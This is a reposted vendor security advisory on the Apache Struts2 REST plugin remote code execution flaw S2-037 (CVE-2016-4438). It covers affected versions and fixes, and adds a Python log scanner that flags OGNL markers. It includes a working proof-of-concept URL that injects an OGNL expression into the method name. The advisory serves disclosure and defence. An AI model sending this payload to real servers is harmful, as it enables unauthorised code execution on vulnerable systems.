Source: myhack58 | Author: Anonymous (佚名) | ID: MYHACK58:62201676305
Published: Jun 27, 2016 - 12:00 a.m.

WVSS and RSAS help you quickly detect the Apache Struts2 remote code execution vulnerability S2-037


When Apache Struts2 is used with the REST plugin, an attacker can pass a malicious expression through a REST call and achieve remote code execution. The vulnerability is tracked as CVE-2016-4438 and named S2-037. Its trigger path is essentially the same as that of S2-033: in both cases an OGNL expression is injected into the methodName of the ActionMapping and evaluated, leading to arbitrary code execution. Still unable to quickly confirm whether your business is secure? WVSS and RSAS help you quickly identify the risk.

Vulnerability overview

Apache Struts2 has again been found to contain a remote code execution vulnerability: an attacker can use the REST plugin to invoke a malicious expression and execute code remotely. The vulnerability is tracked as CVE-2016-4438 and named S2-037.

Vulnerability range

[Figure: global distribution]

Struts 2.3.20-Struts 2.3.28.1

All Struts applications with the REST plugin installed

Exploit PoC

http://127.0.0.1:8080/struts2-rest-showcase/orders/3//%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context[%23parameters. obj%5B0%5D,%5D. getWriter(),%23wr. print(%23parameters. content%5B0%5D%2b602%2b53718%2b1239876),%23wr. close(),xx. toString. json?& amp;obj=com. opensymphony. xwork2. dispatcher. HttpServletResponse&content=paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt

If the response echoes paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt, the vulnerability is present.

Detection method

NSFOCUS customers can use the NSFOCUS Web Vulnerability Scanning System (NSFOCUS WVSS) and the NSFOCUS Remote Security Assessment System (NSFOCUS RSAS) to check whether their own application systems are vulnerable. Both products implemented full detection capability for this vulnerability as soon as it was disclosed; after updating the plugin library, you can scan for it quickly, accurately and comprehensively.

[Figure: exploit name]
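
One way to look for this pattern in your own web server logs, as an added example that is not part of the original article or of any NSFOCUS product: the script percent-decodes each request path and flags OGNL markers like those visible in the PoC above. The access-log format, the sample lines and the marker list are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# OGNL markers visible in the S2-037 proof-of-concept path on this page.
OGNL_MARKERS = re.compile(
    r"#_memberAccess|#context|#parameters|@[\w.$]+@\w+", re.IGNORECASE
)
# Characters a REST action/method path segment has no reason to contain (assumption).
SUSPICIOUS_CHARS = re.compile(r"[#@(),=]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/[\d.]+"'
)


def decode_path(target, rounds=3):
    """Return the URL path (query string dropped), percent-decoded repeatedly."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):  # repeated decoding catches %2523-style double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(log_line):
    """Return 'ognl', 'suspicious', 'clean', or None if the line is unparseable."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path = decode_path(m.group(1))
    if OGNL_MARKERS.search(path):
        return "ognl"
    if any(SUSPICIOUS_CHARS.search(seg) for seg in path.split("/")):
        return "suspicious"
    return "clean"


# Constructed sample lines (not real traffic); the expressions are truncated.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jun/2016:10:00:01 +0800] "GET /struts2-rest-showcase/orders/3.json HTTP/1.1" 200 312',
    '10.0.0.9 - - [27/Jun/2016:10:00:07 +0800] "GET /struts2-rest-showcase/orders/3/%23_memberAccess%3dX,%23wr.json?content=abc HTTP/1.1" 200 64',
    '10.0.0.9 - - [27/Jun/2016:10:00:09 +0800] "GET /struts2-rest-showcase/orders/3/%2523context.json HTTP/1.1" 200 64',
    '10.0.0.7 - - [27/Jun/2016:10:00:12 +0800] "GET /struts2-rest-showcase/orders/3/edit(1) HTTP/1.1" 404 0',
    '10.0.0.5 - - [27/Jun/2016:10:00:15 +0800] "GET /struts2-rest-showcase/orders?q=a%23b HTTP/1.1" 200 900',
]


def scan(lines):
    """Return (verdict, line) pairs for every parseable line that is not clean."""
    return [(v, l) for l in lines if (v := classify(l)) not in ("clean", None)]
```

Only the path is inspected because the expression in S2-037 travels in the REST path segment that becomes the method name; a hit is a lead for review, not proof of compromise.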

Fix method

1. Add cleanupActionName filtering;

2. Use a web application firewall or other security devices for protection;

3. Watch the Apache website and update to Struts 2.3.29 promptly: https://struts.apache.org/

Refer to the official notice:
https://cwiki.apache.org/confluence/display/WW/s2-037